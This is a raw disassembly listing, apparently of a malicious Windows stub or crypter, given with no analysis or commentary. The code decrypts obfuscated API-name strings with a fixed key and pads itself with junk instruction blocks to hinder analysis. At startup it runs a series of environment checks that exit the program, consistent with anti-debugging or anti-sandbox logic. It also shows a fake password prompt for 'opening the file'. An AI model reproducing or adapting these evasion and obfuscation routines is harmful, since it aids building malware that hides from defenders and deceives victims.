lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_121]
push eax
lea eax, [ebp+var_10]
push eax
push 0
mov eax, [ebp+var_4]
call sub_100019D8
push eax
mov eax, [ebp+var_C]
push eax
call ds:dword_1000883C
test eax, eax
jnz short loc_10005415
lea eax, [ebp+var_13C]
lea edx, [ebp+var_121]
call sub_1000180C
mov eax, [ebp+var_13C]
mov edx, [ebp+var_4]
call sub_10001924
jnz short loc_1000543B
mov [ebp+var_5], 0
mov eax, [ebp+var_C]
push eax
call ds:dword_10008840
jmp short loc_10005445
; ---------------------------------------------------------------------------
loc_10005415: ; CODE XREF: sub_100051D4+20E�j
mov eax, [ebp+var_4]
call sub_10001854
push eax
mov eax, [ebp+var_4]
call sub_100019D8
push eax
push 1
push 0
mov eax, [ebp+var_4]
call sub_100019D8
push eax
mov eax, [ebp+var_C]
push eax
call [ebp+var_20]
loc_1000543B: ; CODE XREF: sub_100051D4+22F�j
mov eax, [ebp+var_C]
push eax
call ds:dword_10008840
loc_10005445: ; CODE XREF: sub_100051D4+154�j
; sub_100051D4+195�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10005472
loc_10005452: ; CODE XREF: sub_100051D4+29C�j
lea eax, [ebp+var_13C]
mov edx, 6
call sub_100016FC
lea eax, [ebp+var_4]
call sub_100016D8
retn
; ---------------------------------------------------------------------------
loc_1000546B: ; DATA XREF: sub_100051D4+3D�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_10005452
; ---------------------------------------------------------------------------
loc_10005472: ; CODE XREF: sub_100051D4+296�j
; DATA XREF: sub_100051D4+279�o
mov al, [ebp+var_5]
mov esp, ebp
pop ebp
retn
sub_100051D4 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 0Fh
dword_10005484 dd 795E5D65h, 4A5C5949h, 3B240B5Ah, 43C06h, 0FFFFFFFFh
; DATA XREF: sub_100051D4+53�o
dd 0Eh
dword_1000549C dd 695E5D65h, 5F6B485Eh, 7243553h, 53Bh, 0FFFFFFFFh, 17h
; DATA XREF: sub_100051D4+83�o
dword_100054B4 dd 6E7F7764h, 7B6F7D6Ch, 2D331063h, 2B243624h, 253B0F67h
; DATA XREF: sub_100051D4+D0�o
; sub_100051D4+1B6�o
dd 3E3C3Eh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100054CC proc near ; DATA XREF: sub_100056E0+256�o
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
add esp, 0FFFFFFDCh
xor eax, eax
mov [ebp+var_24], eax
mov [ebp+var_20], eax
mov [ebp+var_1C], eax
mov [ebp+var_18], eax
xor eax, eax
push ebp
push offset loc_1000560C
push dword ptr fs:[eax]
mov fs:[eax], esp
lea ecx, [ebp+var_18]
mov edx, 20200437h
mov eax, offset dword_10005624
call sub_100022B8
mov eax, [ebp+var_18]
call sub_100019D8
push eax
mov eax, ds:dword_100087F0
push eax
call ds:dword_100087F8
mov [ebp+var_8], eax
lea ecx, [ebp+var_1C]
mov edx, 20200437h
mov eax, offset dword_1000563C
call sub_100022B8
mov eax, [ebp+var_1C]
call sub_100019D8
push eax
mov eax, ds:dword_100087F0
push eax
call ds:dword_100087F8
mov [ebp+var_C], eax
lea ecx, [ebp+var_20]
mov edx, 20200437h
mov eax, offset aGwjnjitjr21 ; "gWJNjITJr%21\"# "
call sub_100022B8
mov eax, [ebp+var_20]
call sub_100019D8
push eax
mov eax, ds:dword_100087F0
push eax
call ds:dword_100087F8
mov [ebp+var_10], eax
lea ecx, [ebp+var_24]
mov edx, 20200437h
mov eax, offset dword_1000566C
call sub_100022B8
mov eax, [ebp+var_24]
call sub_100019D8
push eax
mov eax, ds:dword_100087F0
push eax
call ds:dword_100087F8
mov [ebp+var_14], eax
mov eax, [ebp+arg_4]
sub eax, 2
jz short loc_100055D6
sub eax, 10Fh
jnz short loc_100055DB
mov eax, [ebp+arg_8]
and eax, 0FFFFh
cmp eax, 8
jnz short loc_100055DB
push 0FEh
push offset dword_100086AC
mov eax, ds:dword_100086A8
push eax
call [ebp+var_8]
push 0
push 0
push 10h
mov eax, ds:dword_100086A4
push eax
call [ebp+var_C]
jmp short loc_100055DB
; ---------------------------------------------------------------------------
loc_100055D6: ; CODE XREF: sub_100054CC+D0�j
push 0
call [ebp+var_10]
loc_100055DB: ; CODE XREF: sub_100054CC+D7�j
; sub_100054CC+E4�j ...
mov eax, [ebp+arg_C]
push eax
mov eax, [ebp+arg_8]
push eax
mov eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_0]
push eax
call [ebp+var_14]
mov [ebp+var_4], eax
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10005613
loc_100055FE: ; CODE XREF: sub_100054CC+145�j
lea eax, [ebp+var_24]
mov edx, 4
call sub_100016FC
retn
; ---------------------------------------------------------------------------
loc_1000560C: ; DATA XREF: sub_100054CC+17�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_100055FE
; ---------------------------------------------------------------------------
loc_10005613: ; CODE XREF: sub_100054CC+13F�j
; DATA XREF: sub_100054CC+12D�o
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn 10h
sub_100054CC endp
; ---------------------------------------------------------------------------
dd 0FFFFFFFFh, 0Eh
dword_10005624 dd 6D4D5D70h, 51595252h, 3A241448h, 537h, 0FFFFFFFFh, 0Ch
; DATA XREF: sub_100054CC+2A�o
dword_1000563C dd 4E4A5767h, 4D4E5976h, 324275Eh, 0 dd 0FFFFFFFFh, 0Fh
aGwjnjitjr21 db 'gWJNjITJr%21"# ',0 ; DATA XREF: sub_100054CC+7E�o
dd 0FFFFFFFFh, 0Eh
dword_1000566C dd 6D5F5D73h, 51595252h, 2D331048h, 520h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1000567C proc near ; CODE XREF: sub_100056E0+2D4�p
; sub_100056E0+357�p
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
mov [ebp+var_C], ecx
mov [ebp+var_8], edx
mov [ebp+var_4], eax
call sub_1000142C
mov [ebp+var_12], ax
mov eax, [ebp+arg_0]
push eax
mov eax, [ebp+arg_4]
push eax
mov eax, [ebp+arg_8]
push eax
mov eax, [ebp+arg_C]
push eax
mov eax, [ebp+arg_10]
push eax
mov eax, [ebp+arg_14]
push eax
mov eax, [ebp+arg_18]
push eax
mov eax, [ebp+arg_1C]
push eax
mov eax, [ebp+var_C]
push eax
mov eax, [ebp+var_8]
push eax
mov eax, [ebp+var_4]
push eax
push 0
call ds:dword_10008844
mov [ebp+var_10], eax
mov ax, [ebp+var_12]
call sub_1000141C
mov eax, [ebp+var_10]
mov esp, ebp
pop ebp
retn 20h
sub_1000567C endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100056E0 proc near ; CODE XREF: CODE:10005E42�p
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFBCh
xor eax, eax
mov [ebp+var_40], eax
mov [ebp+var_3C], eax
mov [ebp+var_38], eax
mov [ebp+var_34], eax
mov [ebp+var_30], eax
mov [ebp+var_2C], eax
mov [ebp+var_28], eax
xor eax, eax
push ebp
push offset loc_10005A7F
push dword ptr fs:[eax]
mov fs:[eax], esp
lea ecx, [ebp+var_28]
mov edx, 20200437h
mov eax, offset aPMiboiR615 ; "p]MiBOI[R\r$61-&5"
call sub_100022B8
mov eax, [ebp+var_28]
call sub_100019D8
push eax
mov eax, ds:dword_100087F0
push eax
call ds:dword_100087F8
mov [ebp+var_C], eax
lea ecx, [ebp+var_2C]
mov edx, 20200437h
mov eax, offset dword_10005AB0
call sub_100022B8
mov eax, [ebp+var_2C]
call sub_100019D8
push eax
mov eax, ds:dword_100087F0
push eax
call ds:dword_100087F8
mov [ebp+var_10], eax
lea ecx, [ebp+var_30]
mov edx, 20200437h
mov eax, offset dword_10005AC8
call sub_100022B8
mov eax, [ebp+var_30]
call sub_100019D8
push eax
mov eax, ds:dword_100087F0
push eax
call ds:dword_100087F8
mov [ebp+var_14], eax
pusha
xor eax, 0Bh
xor ecx, edi
rol esi, 0Eh
xor ecx, 33h
dec ecx
mov ecx, 78h
rol ecx, 0D9h
sub edi, 0ACh
xor esi, eax
mov esi, 0F6h
mov esi, 57h
inc ebx
sub esi, 70h
sub edx, 2Eh
nop
inc ecx
add eax, 2Dh
ror eax, 0E5h
popa
pusha
sub edx, 0E9h
mov edx, eax
dec edi
ror esi, 89h
ror edx, 1Bh
nop
inc edx
add ecx, 66h
add ebx, 0F8h
mov eax, 33h
xor edi, 0C5h
nop
mov ebx, esi
xor ecx, esi
xor edx, 2Fh
popa
pusha
mov edi, ecx
rol eax, 4Bh
sub edi, 86h
ror eax, 0BBh
nop
sub edi, 0CBh
inc esi
mov edx, 1Bh
nop
rol ebx, 0D9h
inc eax
add edi, 0FDh
mov edx, 6Ah
sub ecx, 7Fh
mov eax, 94h
mov esi, ebx
mov edi, ebx
add edi, 6Bh
inc edx
mov ebx, 18h
mov edi, 2Dh
rol esi, 0EBh
dec ecx
xor eax, ecx
sub eax, 25h
mov edi, 0B7h
rol edx, 0CCh
ror edi, 4Dh
ror esi, 62h
popa
lea ecx, [ebp+var_34]
mov edx, 20200437h
mov eax, offset dword_10005AE0
call sub_100022B8
mov eax, [ebp+var_34]
call sub_100019D8
push eax
mov eax, ds:dword_100087F0
push eax
call ds:dword_100087F8
mov [ebp+var_18], eax
lea ecx, [ebp+var_38]
mov edx, 20200437h
mov eax, offset aCjxthpJz10 ; "cJXTHP\\JZ\r$10%\"#"
call sub_100022B8
mov eax, [ebp+var_38]
call sub_100019D8
push eax
mov eax, ds:dword_100087F0
push eax
call ds:dword_100087F8
mov [ebp+var_1C], eax
lea ecx, [ebp+var_3C]
mov edx, 20200437h
mov eax, offset aSqjjzhVr21 ; "sQJJZH^Vr%21\"# \a"
call sub_100022B8
mov eax, [ebp+var_3C]
call sub_100019D8
push eax
mov eax, ds:dword_100087F0
push eax
call ds:dword_100087F8
mov [ebp+var_20], eax
lea ecx, [ebp+var_40]
mov edx, 20200437h
mov eax, offset dword_10005B2C
call sub_100022B8
mov eax, [ebp+var_40]
call sub_100019D8
push eax
mov eax, ds:dword_100087F0
push eax
call ds:dword_100087F8
mov [ebp+var_24], eax
push 10h
call [ebp+var_C]
sub eax, 17Ch
mov [ebp+var_44], eax
fild [ebp+var_44]
fdiv flt_10005B38
call sub_10001434
mov [ebp+var_4], eax
push 11h
call [ebp+var_C]
sub eax, 3Fh
mov [ebp+var_44], eax
fild [ebp+var_44]
fdiv flt_10005B38
call sub_10001434
mov [ebp+var_8], eax
xor eax, eax
mov ds:dword_100087B8, eax
mov ds:dword_100087BC, offset sub_100054CC
xor eax, eax
mov ds:dword_100087C0, eax
xor eax, eax
mov ds:dword_100087C4, eax
mov eax, ds:dword_1000866C
mov ds:dword_100087C8, eax
push 7F00h
push 0
call [ebp+var_24]
mov ds:dword_100087D0, eax
mov ds:dword_100087D4, 10h
xor eax, eax
mov ds:dword_100087D8, eax
mov eax, offset dword_10005B3C
mov ds:dword_100087DC, eax
push offset dword_100087B8
call [ebp+var_10]
mov eax, [ebp+var_4]
push eax
mov eax, [ebp+var_8]
push eax
push 17Ch
push 3Fh
push 0
push 0
mov eax, ds:dword_1000866C
push eax
push 0
mov edx, offset aPleaseEnterThe ; "Please enter the correct password to op"...
mov ecx, 10080000h
mov eax, ds:dword_100087DC
call sub_1000567C
mov ds:dword_100086A4, eax
push 0
mov eax, ds:dword_1000866C
push eax
push 0
mov eax, ds:dword_100086A4
push eax
push 15h
push 140h
push 5
push 5
push 50000080h
push offset dword_10005B74
push offset aEdit ; "EDIT"
push 200h
call ds:dword_10008844
mov ds:dword_100086A8, eax
push 0
push 0
push 30h
mov eax, ds:dword_100086A8
push eax
call [ebp+var_14]
push 0
push 0
push 30h
push 148h
push 6
push 2Bh
push 13h
mov eax, ds:dword_100086A4
push eax
push 8
mov eax, ds:dword_1000866C
push eax
push 0
mov edx, offset aOk ; "OK"
mov eax, offset aButton ; "BUTTON"
mov ecx, 50000000h
call sub_1000567C
push eax
call [ebp+var_14]
jmp short loc_10005A52
; ---------------------------------------------------------------------------
loc_10005A42: ; CODE XREF: sub_100056E0+382�j
push offset dword_10008688
call [ebp+var_1C]
push offset dword_10008688
call [ebp+var_20]
loc_10005A52: ; CODE XREF: sub_100056E0+360�j
push 0
push 0
push 0
push offset dword_10008688
call [ebp+var_18]
test eax, eax
jnz short loc_10005A42
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10005A86
loc_10005A71: ; CODE XREF: sub_100056E0+3A4�j
lea eax, [ebp+var_40]
mov edx, 7
call sub_100016FC
retn
; ---------------------------------------------------------------------------
loc_10005A7F: ; DATA XREF: sub_100056E0+20�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_10005A71
; ---------------------------------------------------------------------------
loc_10005A86: ; CODE XREF: sub_100056E0+39E�j
; DATA XREF: sub_100056E0+38C�o
mov esp, ebp
pop ebp
retn
sub_100056E0 endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 10h
aPMiboiR615 db 'p]MiBOI[R',0Dh,'$61-&5',0 ; DATA XREF: sub_100056E0+33�o
align 4
dd 0FFFFFFFFh, 0Eh
dword_10005AB0 dd 535E5D65h, 4C584848h, 31202C7Ch, 530h, 0FFFFFFFFh, 0Ch
; DATA XREF: sub_100056E0+5D�o
dword_10005AC8 dd 5E575D64h, 4D4E5976h, 324275Eh, 0 dd 0FFFFFFFFh, 0Bh
dword_10005AE0 dd 774D5D70h, 5F4E4F5Eh, 2558h, 0FFFFFFFFh, 10h
; DATA XREF: sub_100056E0+175�o
aCjxthpJz10 db 'cJXTHP\JZ',0Dh,'$10%"#',0 ; DATA XREF: sub_100056E0+19F�o
align 4
dd 0FFFFFFFFh, 10h
aSqjjzhVr21 db 'sQJJZH^Vr%21"# ',7,0 ; DATA XREF: sub_100056E0+1C9�o
align 4
dd 0FFFFFFFFh, 0Bh
dword_10005B2C dd 5E58577Bh, 4D4F4978h, 3250hflt_10005B38 dd 2.0 ; DATA XREF: sub_100056E0+225�r
; sub_100056E0+241�r
dword_10005B3C dd 314357h aPleaseEnterThe db 'Please enter the correct password to open the file',0
; DATA XREF: sub_100056E0+2C5�o
align 4
dword_10005B74 dd 0 aEdit db 'EDIT',0 ; DATA XREF: sub_100056E0+303�o
align 10h
aOk db 'OK',0 ; DATA XREF: sub_100056E0+348�o
align 4
aButton db 'BUTTON',0 ; DATA XREF: sub_100056E0+34D�o
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10005B8C proc near ; CODE XREF: CODE:10006A04�p
; CODE:10006A6F�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
add esp, 0FFFFFFE8h
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
call sub_100019C8
xor eax, eax
push ebp
push offset loc_10005C48
push dword ptr fs:[eax]
mov fs:[eax], esp
mov [ebp+var_10], 0
mov [ebp+var_C], 0
call sub_100013E0
cmp [ebp+var_4], 0
jz short loc_10005C32
mov eax, [ebp+var_4]
mov edx, offset dword_10005C64
call sub_10001924
jz short loc_10005C32
mov eax, [ebp+var_4]
call sub_10001854
test eax, eax
jle short loc_10005C1F
mov [ebp+var_18], eax
mov [ebp+var_14], 1
loc_10005BE9: ; CODE XREF: sub_10005B8C+7A�j
mov eax, [ebp+var_4]
mov edx, [ebp+var_14]
mov al, [eax+edx-1]
and eax, 0FFh
xor edx, edx
add [ebp+var_10], eax
adc [ebp+var_C], edx
inc [ebp+var_14]
dec [ebp+var_18]
jnz short loc_10005BE9
jmp short loc_10005C1F
; ---------------------------------------------------------------------------
loc_10005C0A: ; CODE XREF: sub_10005B8C+A0�j
; sub_10005B8C:loc_10005C30�j
push 0
push 2
mov eax, [ebp+var_10]
mov edx, [ebp+var_C]
call sub_10001CF0
mov [ebp+var_10], eax
mov [ebp+var_C], edx
loc_10005C1F: ; CODE XREF: sub_10005B8C+51�j
; sub_10005B8C+7C�j
cmp [ebp+var_C], 0
jnz short loc_10005C30
cmp [ebp+var_10], 3B9AC9FFh
jb short loc_10005C0A
jmp short loc_10005C32
; ---------------------------------------------------------------------------
loc_10005C30: ; CODE XREF: sub_10005B8C+97�j
jl short loc_10005C0A
loc_10005C32: ; CODE XREF: sub_10005B8C+36�j
; sub_10005B8C+45�j ...
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10005C4F
loc_10005C3F: ; CODE XREF: sub_10005B8C+C1�j
lea eax, [ebp+var_4]
call sub_100016D8
retn
; ---------------------------------------------------------------------------
loc_10005C48: ; DATA XREF: sub_10005B8C+14�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_10005C3F
; ---------------------------------------------------------------------------
loc_10005C4F: ; CODE XREF: sub_10005B8C+BB�j
; DATA XREF: sub_10005B8C+AE�o
mov eax, [ebp+var_10]
mov edx, [ebp+var_C]
mov esp, ebp
pop ebp
retn
sub_10005B8C endp
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 1
dword_10005C64 dd 30h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10005C68 proc near ; DATA XREF: CODE:10005CCC�o
push ebp
mov ebp, esp
xor eax, eax
push ebp
push offset loc_10005C87
push dword ptr fs:[eax]
mov fs:[eax], esp
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_10005C8E
loc_10005C86: ; CODE XREF: sub_10005C68+24�j
retn
; ---------------------------------------------------------------------------
loc_10005C87: ; DATA XREF: sub_10005C68+6�o
jmp loc_100014A8
; ---------------------------------------------------------------------------
jmp short loc_10005C86
; ---------------------------------------------------------------------------
loc_10005C8E: ; CODE XREF: sub_10005C68:loc_10005C86�j
; DATA XREF: sub_10005C68+19�o
pop ebp
retn
sub_10005C68 endp
; ---------------------------------------------------------------------------
dword_10005C90 dd 7, 10005C98h, 10001F3Ch, 10001F00h, 10001D98h, 10001D5Ch
; DATA XREF: CODE:10005CDF�o
dd 10001F74h, 10001F44h, 10001FDCh, 10001FACh, 100021E0h
dd 100021B0h, 100022B0h, 10002280h, 0
dd offset sub_10005C68
; ---------------------------------------------------------------------------
public start
start:
push ebp
mov ebp, esp
mov ecx, 1Dh
loc_10005CD8: ; CODE XREF: CODE:10005CDD�j
push 0
push 0
dec ecx
jnz short loc_10005CD8
mov eax, offset dword_10005C90
call sub_10001EBC
xor eax, eax
push ebp
push offset loc_10006C30
push dword ptr fs:[eax]
mov fs:[eax], esp
call sub_100038F0
test al, al
jz short loc_10005D08
push 0
call ds:dword_10008834
loc_10005D08: ; CODE XREF: CODE:10005CFE�j
call sub_10004540
test al, al
jz short loc_10005D19
push 0
call ds:dword_10008834
loc_10005D19: ; CODE XREF: CODE:10005D0F�j
call sub_10004C28
test al, al
jz short loc_10005D2A
push 0
call ds:dword_10008834
loc_10005D2A: ; CODE XREF: CODE:10005D20�j
lea eax, [ebp-18h]
call sub_100048E0
cmp dword ptr [ebp-18h], 0
jnz short loc_10005D40
push 0
call ds:dword_10008834
loc_10005D40: ; CODE XREF: CODE:10005D36�j
lea ecx, [ebp-1Ch]
mov edx, 20200437h
mov eax, offset dword_10006C44
call sub_100022B8
mov eax, [ebp-1Ch]
call sub_100019D8
push eax
mov eax, ds:dword_100087F4
push eax
call ds:dword_100087F8
mov ds:dword_1000B4F4, eax
lea ecx, [ebp-20h]
mov edx, 20200437h
mov eax, offset dword_10006C5C
call sub_100022B8
mov eax, [ebp-20h]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov ds:dword_1000B4F8, eax
lea ecx, [ebp-24h]
mov edx, 20200437h
mov eax, offset dword_10006C74
call sub_100022B8
mov eax, [ebp-24h]
call sub_100019D8
push eax
mov eax, ds:hModule
push eax
call ds:dword_100087F8
mov ds:dword_1000B4FC, eax
lea ecx, [ebp-28h]
mov edx, 20200437h
mov eax, offset dword_10006C8C
call sub_100022B8
mov eax, [ebp-28h]
call sub_100019D8
push eax
mov eax, ds:dword_100087F0
push eax
call ds:dword_100087F8
mov ds:dword_1000B4CC, eax
mov edx, offset aZqfgf ; "ZQFGF"
mov eax, offset dword_10008850
call sub_10004D04
mov ds:dword_1000884C, eax
cmp ds:dword_1000884C, 0
jnz short loc_10005E15
push 0
call ds:dword_10008834
loc_10005E15: ; CODE XREF: CODE:10005E0B�j
mov edx, offset byte_10008854
mov eax, ds:dword_1000884C
mov ecx, ds:dword_10008850
call sub_100011D4
lea eax, [ebp-2Ch]
mov edx, offset dword_1000B39C
mov ecx, 100h
call sub_1000183C
cmp dword ptr [ebp-2Ch], 0
jz short loc_10005EBC
call sub_100056E0
lea eax, [ebp-30h]
mov edx, offset dword_100086AC
mov ecx, 105h
call sub_1000183C
mov eax, [ebp-30h]
push eax
lea eax, [ebp-38h]
mov edx, offset dword_1000B39C
mov ecx, 100h
call sub_1000183C
mov eax, [ebp-38h]
lea ecx, [ebp-34h]
mov edx, 20200437h
call sub_100022B8
mov edx, [ebp-34h]
pop eax
call sub_10001924
jz short loc_10005EBC
push 10h
push offset aError ; "Error"
lea ecx, [ebp-3Ch]
mov edx, 20200437h
mov eax, offset dword_10006CB0
call sub_100022B8
mov eax, [ebp-3Ch]
call sub_100019D8
push eax
push 0
call ds:dword_1000B4CC
push 0
call ds:dword_10008834
loc_10005EBC: ; CODE XREF: CODE:10005E40�j
; CODE:10005E88�j
mov ds:byte_1000B4F1, 0
cmp ds:byte_1000B4AD, 1
jz short loc_10005EDE
cmp ds:byte_1000B4AC, 1
jz short loc_10005EDE
cmp ds:byte_1000B380, 1
jnz short loc_10005F0C
loc_10005EDE: ; CODE XREF: CODE:10005ECA�j
; CODE:10005ED3�j
lea eax, [ebp-40h]
mov edx, offset word_1000B382
mov ecx, 1Ah
call sub_1000183C
mov eax, [ebp-40h]
call sub_100051D4
test al, al
jz short loc_10005F05
mov ds:byte_1000B4F1, 1
jmp short loc_10005F0C
; ---------------------------------------------------------------------------
loc_10005F05: ; CODE XREF: CODE:10005EFA�j
mov ds:byte_1000B4F1, 0
loc_10005F0C: ; CODE XREF: CODE:10005EDC�j
; CODE:10005F03�j
cmp ds:byte_10008A59, 1
jnz loc_10005F9E
call sub_10003880
cmp al, 1
jz short loc_10005F34
call sub_100038B8
cmp al, 1
jz short loc_10005F34
call sub_10004670
cmp al, 1
jnz short loc_10005F9E
loc_10005F34: ; CODE XREF: CODE:10005F20�j
; CODE:10005F29�j
mov eax, ds:dword_10009EE8
add eax, ds:dword_1000B378
push eax
lea eax, [ebp-48h]
mov edx, offset word_10008A5A
mov ecx, 100h
call sub_1000183C
mov eax, [ebp-48h]
lea ecx, [ebp-44h]
mov edx, 20200437h
call sub_100022B8
mov eax, [ebp-44h]
call sub_100019D8
push eax
lea eax, [ebp-50h]
mov edx, offset word_10008B5A
mov ecx, 1389h
call sub_1000183C
mov eax, [ebp-50h]
lea ecx, [ebp-4Ch]
mov edx, 20200437h
call sub_100022B8
mov eax, [ebp-4Ch]
call sub_100019D8
push eax
push 0
call ds:dword_1000B4CC
loc_10005F9E: ; CODE XREF: CODE:10005F13�j
; CODE:10005F32�j
pusha
add edi, 77h
ror edi, 0D8h
mov esi, 0C2h
inc esi
xor ecx, 8Fh
nop
inc ebx
nop
mov eax, ecx
xor eax, 0BDh
nop
nop
nop
dec ecx
inc edi
mov edx, 0F1h
add ecx, 0AFh
xor eax, 0C4h
nop
xor edi, ecx
xor eax, 8Ch
mov esi, ebx
nop
xor edi, 54h
nop
mov esi, ebx
rol edi, 0F0h
inc esi
inc ecx
mov eax, ecx
inc eax
rol esi, 0FDh
inc ecx
xor eax, ecx
add eax, 0Bh
inc edi
nop
nop
mov edx, eax
mov esi, eax
popa
pusha
xor ebx, esi
add edx, 0Fh
dec edx
mov edx, eax
add esi, 6
xor edx, eax
dec esi
add esi, 81h
xor edx, 13h
xor ebx, esi
add ecx, 83h
nop
xor edx, edi
rol edx, 0C3h
inc ecx
xor edi, ecx
mov eax, 79h
rol edi, 63h
add edx, 78h
mov ecx, esi
nop
mov edx, edi
mov esi, 9Bh
ror ecx, 59h
inc ebx
mov edi, ebx
add edi, 0E4h
inc eax
mov eax, ecx
mov eax, ecx
xor eax, edx
nop
rol ebx, 4Eh
nop
dec eax
dec esi
add ebx, 67h
xor edi, ecx
ror eax, 9
dec esi
xor ebx, 0E1h
popa
pusha
ror ebx, 4Bh
rol edx, 0A6h
add edx, 33h
add edi, 5Dh
ror edi, 6Ch
nop
sub eax, 0C8h
mov ecx, 49h
mov ebx, 8Ah
xor edi, ecx
nop
sub edx, 98h
xor ebx, esi
ror ecx, 0B7h
inc eax
inc edi
rol esi, 0F0h
mov esi, eax
inc edi
rol edi, 14h
ror esi, 0F7h
mov esi, 7
rol edx, 16h
ror edx, 26h
nop
nop
xor esi, ecx
xor ecx, 4Fh
nop
mov ecx, 5Eh
dec ebx
add esi, 5Dh
nop
dec esi
mov ecx, esi
popa
cmp ds:byte_10009EEC, 1
jnz loc_100061DB
call sub_10003880
test al, al
jnz loc_100061DB
call sub_100038B8
test al, al
jnz loc_100061DB
call sub_10004670
test al, al
jnz loc_100061DB
cmp ds:byte_1000B380, 0
jnz short loc_10006168
mov eax, ds:dword_1000B37C
add eax, ds:dword_1000B378
push eax
lea eax, [ebp-58h]
mov edx, offset byte_10009EED
mov ecx, 100h
call sub_1000183C
mov eax, [ebp-58h]
lea ecx, [ebp-54h]
mov edx, 20200437h
call sub_100022B8
mov eax, [ebp-54h]
call sub_100019D8
push eax
lea eax, [ebp-60h]
mov edx, offset byte_10009FED
mov ecx, 1389h
call sub_1000183C
mov eax, [ebp-60h]
lea ecx, [ebp-5Ch]
mov edx, 20200437h
call sub_100022B8
mov eax, [ebp-5Ch]
call sub_100019D8
push eax
push 0
call ds:dword_1000B4CC
jmp short loc_100061DB
; ---------------------------------------------------------------------------
loc_10006168: ; CODE XREF: CODE:100060FA�j
cmp ds:byte_1000B4F1, 0
jz short loc_100061DB
mov eax, ds:dword_1000B37C
add eax, ds:dword_1000B378
push eax
lea eax, [ebp-68h]
mov edx, offset byte_10009EED
mov ecx, 100h
call sub_1000183C
mov eax, [ebp-68h]
lea ecx, [ebp-64h]
mov edx, 20200437h
call sub_100022B8
mov eax, [ebp-64h]
call sub_100019D8
push eax
lea eax, [ebp-70h]
mov edx, offset byte_10009FED
mov ecx, 1389h
call sub_1000183C
mov eax, [ebp-70h]
lea ecx, [ebp-6Ch]
mov edx, 20200437h
call sub_100022B8
mov eax, [ebp-6Ch]
call sub_100019D8
push eax
push 0
call ds:dword_1000B4CC
loc_100061DB: ; CODE XREF: CODE:100060C6�j
; CODE:100060D3�j ...
call sub_10003880
cmp al, 1
jnz short loc_100061F5
cmp ds:byte_10008A57, 1
jnz short loc_100061F5
push 0
call ds:dword_10008834
loc_100061F5: ; CODE XREF: CODE:100061E2�j
; CODE:100061EB�j
call sub_100038B8
cmp al, 1
jnz short loc_1000620F
cmp ds:byte_10008A57, 1
jnz short loc_1000620F
push 0
call ds:dword_10008834
loc_1000620F: ; CODE XREF: CODE:100061FC�j
; CODE:10006205�j
call sub_10004670
cmp al, 1
jnz short loc_10006229
cmp ds:byte_1000B381, 1
jnz short loc_10006229
push 0
call ds:dword_10008834
loc_10006229: ; CODE XREF: CODE:10006216�j
; CODE:1000621F�j
cmp ds:dword_1000B4A8, 0
jnz short loc_10006239
cmp ds:dword_1000B4A4, 0
loc_10006239: ; CODE XREF: CODE:10006230�j
jz short loc_10006271
cmp ds:byte_1000B4AC, 1
jnz short loc_10006260
cmp ds:byte_1000B4F1, 0
jz short loc_10006271
imul eax, ds:dword_1000B4A4, 3E8h
push eax
call ds:dword_10008848
jmp short loc_10006271
; ---------------------------------------------------------------------------
loc_10006260: ; CODE XREF: CODE:10006242�j
imul eax, ds:dword_1000B4A4, 3E8h
push eax
call ds:dword_10008848
loc_10006271: ; CODE XREF: CODE:loc_10006239�j
; CODE:1000624B�j ...
mov ds:byte_1000B4F0, 0
cmp ds:byte_1000B49C, 0
jz loc_1000672C
push offset dword_1000B4E0
call ds:dword_1000B4F8
jmp loc_10006324
; ---------------------------------------------------------------------------
db 0DAh, 85h, 0E5h
dd 6D25165Dh
